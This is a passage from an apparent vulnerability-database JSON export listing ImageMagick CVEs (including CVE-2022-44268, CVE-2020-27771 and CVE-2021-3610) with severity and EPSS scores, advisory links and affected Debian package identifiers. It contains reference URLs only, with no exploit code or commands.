"reference_type": "", "scores": [ { "value": "0.88528", "scoring_system": "epss", "scoring_elements": "0.99509", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.88528", "scoring_system": "epss", "scoring_elements": "0.99496", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.88528", "scoring_system": "epss", "scoring_elements": "0.99498", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.88528", "scoring_system": "epss", "scoring_elements": "0.995", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.88528", "scoring_system": "epss", "scoring_elements": "0.99501", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.88528", "scoring_system": "epss", "scoring_elements": "0.99503", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.88528", "scoring_system": "epss", "scoring_elements": "0.99506", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.88528", "scoring_system": "epss", "scoring_elements": "0.99507", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.88528", "scoring_system": "epss", "scoring_elements": "0.99508", "published_at": "2026-04-21T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2022-44268" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44267", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44267" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44268", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44268" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1030767", "reference_id": "1030767", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1030767" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=2167594", "reference_id": "2167594", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2167594" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AINSUL2QBKETGYRPA7XSCMJWLUB44M6S/", "reference_id": "AINSUL2QBKETGYRPA7XSCMJWLUB44M6S", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-26T14:21:09Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AINSUL2QBKETGYRPA7XSCMJWLUB44M6S/" }, { "reference_url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/local/51261.txt", "reference_id": "CVE-2022-44268", "reference_type": "exploit", "scores": [], "url": "https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/local/51261.txt" }, { "reference_url": "https://www.debian.org/security/2023/dsa-5347", "reference_id": "dsa-5347", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-26T14:21:09Z/" } ], "url": "https://www.debian.org/security/2023/dsa-5347" }, { "reference_url": "https://security.gentoo.org/glsa/202405-02", "reference_id": "GLSA-202405-02", "reference_type": "", "scores": [], "url": "https://security.gentoo.org/glsa/202405-02" }, { "reference_url": "http://packetstormsecurity.com/files/171727/ImageMagick-7.1.0-48-Arbitrary-File-Read.html", "reference_id": "ImageMagick-7.1.0-48-Arbitrary-File-Read.html", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-26T14:21:09Z/" } ], "url": "http://packetstormsecurity.com/files/171727/ImageMagick-7.1.0-48-Arbitrary-File-Read.html" }, { "reference_url": "https://imagemagick.org/", "reference_id": "imagemagick.org", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-26T14:21:09Z/" } ], "url": "https://imagemagick.org/" }, { "reference_url": "https://www.metabaseq.com/imagemagick-zero-days/", "reference_id": "imagemagick-zero-days", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-26T14:21:09Z/" } ], "url": "https://www.metabaseq.com/imagemagick-zero-days/" }, { "reference_url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00008.html", "reference_id": "msg00008.html", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-26T14:21:09Z/" } ], "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00008.html" }, { "reference_url": "https://usn.ubuntu.com/5855-1/", "reference_id": "USN-5855-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5855-1/" }, { "reference_url": "https://usn.ubuntu.com/5855-2/", "reference_id": "USN-5855-2", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5855-2/" }, { "reference_url": "https://usn.ubuntu.com/5855-4/", "reference_id": "USN-5855-4", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/5855-4/" }, { "reference_url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZZLLS37P67CMBRML6OCG42GPCKGRCJNV/", "reference_id": "ZZLLS37P67CMBRML6OCG42GPCKGRCJNV", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-03-26T14:21:09Z/" } ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZZLLS37P67CMBRML6OCG42GPCKGRCJNV/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2022-44268" ], "risk_score": 10.0, "exploitability": "2.0", "weighted_severity": "5.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mmw7-4m3z-2kcn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/81953?format=api", "vulnerability_id": "VCID-mn5y-2hmf-dkgy", "summary": "ImageMagick: outside the range of representable values of type 'unsigned char' at coders/pdf.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27771.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-27771.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27771", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00105", "scoring_system": "epss", "scoring_elements": "0.28503", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00105", "scoring_system": "epss", "scoring_elements": "0.28589", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00105", "scoring_system": "epss", "scoring_elements": "0.28633", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00105", "scoring_system": "epss", "scoring_elements": "0.28435", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00105", "scoring_system": "epss", "scoring_elements": "0.28543", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00105", "scoring_system": "epss", "scoring_elements": "0.28544", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00105", "scoring_system": "epss", "scoring_elements": "0.28502", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00105", "scoring_system": "epss", "scoring_elements": "0.28452", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00105", "scoring_system": "epss", "scoring_elements": "0.28468", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00105", "scoring_system": "epss", "scoring_elements": "0.28444", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00105", "scoring_system": "epss", "scoring_elements": "0.28395", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00105", "scoring_system": "epss", "scoring_elements": "0.28281", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-27771" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27771", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27771" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898290", "reference_id": "1898290", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898290" }, { "reference_url": "https://usn.ubuntu.com/4988-1/", "reference_id": "USN-4988-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4988-1/" }, { "reference_url": "https://usn.ubuntu.com/7068-1/", "reference_id": "USN-7068-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/7068-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-27771" ], "risk_score": 1.5, "exploitability": "0.5", "weighted_severity": "3.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mn5y-2hmf-dkgy" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/80255?format=api", "vulnerability_id": "VCID-my2x-tnvf-wqbw", "summary": "ImageMagick: heap-based buffer overflow in ReadTIFFImage() in coders/tiff.c", "references": [ { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3610.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3610.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2021-3610", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00218", "scoring_system": "epss", "scoring_elements": "0.44355", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00218", "scoring_system": "epss", "scoring_elements": "0.44459", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00218", "scoring_system": "epss", "scoring_elements": "0.4446", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00218", "scoring_system": "epss", "scoring_elements": "0.44516", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00218", "scoring_system": "epss", "scoring_elements": "0.44507", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00218", "scoring_system": "epss", "scoring_elements": "0.44437", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00219", "scoring_system": "epss", "scoring_elements": "0.44532", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00219", "scoring_system": "epss", "scoring_elements": "0.44537", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00219", "scoring_system": "epss", "scoring_elements": "0.44553", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00219", "scoring_system": "epss", "scoring_elements": "0.44453", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00219", "scoring_system": "epss", "scoring_elements": "0.44544", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00219", "scoring_system": "epss", "scoring_elements": "0.44481", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00219", "scoring_system": "epss", "scoring_elements": "0.44523", "published_at": "2026-04-02T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2021-3610" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3610", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3610" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1115", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1115" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1289", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1289" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1906", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1906" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34151", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34151" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3428", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3428" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5341", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5341" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1037090", "reference_id": "1037090", "reference_type": "", "scores": [], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1037090" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1973689", "reference_id": "1973689", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1973689" }, { "reference_url": "https://security.archlinux.org/AVG-2085", "reference_id": "AVG-2085", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-2085" }, { "reference_url": "https://usn.ubuntu.com/6200-1/", "reference_id": "USN-6200-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/6200-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": 